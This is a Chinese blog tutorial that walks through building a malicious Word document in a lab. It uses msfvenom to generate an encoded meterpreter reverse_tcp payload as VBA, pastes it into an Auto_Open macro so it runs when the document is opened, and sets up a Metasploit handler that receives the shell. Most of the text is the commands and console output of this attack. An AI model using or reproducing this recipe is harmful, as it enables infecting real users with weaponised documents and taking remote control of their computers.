写点什么

网络安全 kali 之利用宏感染 word 文档获取 shell

作者:侠盗安全
  • 2022 年 3 月 25 日
  • 本文字数:641 字

    阅读完需:约 2 分钟

首先将 office 2016.zip 上传到 win7 虚拟机上,解压后,安装一下 office。

┌──(root💀xuegod53)-[~]└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
复制代码

视频教程

执行完成后会生成 2 段代码第一段代码是MACRO CODE [ˈmækrəʊ kəʊd] 宏代码从这里开始:

到这里结束:

第二段代码 payload。

注:*号中的内容不要,从这个往下开始复制,如下:

一直到最后。

打开 Word 新建空白文档,新建宏

宏名 Auto_Open

清除默认的代码,复制第一段 code 代码内容到编辑器中,然后返回到 Word 内容编辑区。

复制第二段代码 payload 到 word 正文,然后保存文档。

按 Ctrl+s 保存

MSF 配置侦听

msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 192.168.1.53msf6 exploit(multi/handler) > jobs -Kmsf6 exploit(multi/handler) > exploit
复制代码

2、配置好侦听之后我们打开我们制作的 word 文档,文档一旦打开就会执行 payload 连接到 MSF,关闭 word 文档之后 session 不受影响。

打开之后我们回到 MSF 控制台

Session 已经建立

meterpreter > getuid Server username: XUESHEN\Administrator
复制代码

我们尝试把 payload 转移到其他进程

meterpreter > getpid 		获取当前进程pidCurrent pid: 2932meterpreter > ps			#查看进程列表,在ps列出的进程列表,倒数第4个就是我们进程的pid
复制代码



用户头像

侠盗安全

关注

还未添加个人签名 2021.11.04 加入

还未添加个人简介

评论

发布
暂无评论
网络安全kali之利用宏感染word文档获取shell_网络安全_侠盗安全_InfoQ写作平台